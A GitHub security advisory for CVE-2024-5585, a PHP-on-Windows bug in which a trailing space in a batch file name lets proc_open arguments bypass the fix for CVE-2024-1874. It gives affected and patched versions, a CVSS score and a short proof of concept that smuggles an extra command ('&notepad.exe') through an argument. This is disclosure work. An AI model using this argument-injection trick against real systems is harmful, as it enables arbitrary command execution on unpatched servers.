Skip to content

bypass CVE-2024-1874

High
smalyshev published GHSA-9fcc-425m-g385 Jun 9, 2024

Package

No package listed

Affected versions

8.3.6

Patched versions

8.1.29, 8.2.20, 8.3.8

Description

Summary

same as CVE-2024-1874

due to the improper handling of command line arguments on Windows, maliciously crafted arguments can inject arbitrary commands even if the bypass_shell option is enabled.

Details

Add a space at the end of filename, others are the same as CVE-2024-1874

PoC

  1. Save the following file as test.bat
echo hello
  1. Save the following file as 1.php, notiece the space at the end of argv-filename
<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat ", "\"&notepad.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);
  1. Run it with PHP and confirm that notepad.exe is popped up.

Impact

Malicious command line arguments in windows platform

Severity

High
7.7
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE ID

CVE-2024-5585

Weaknesses

Credits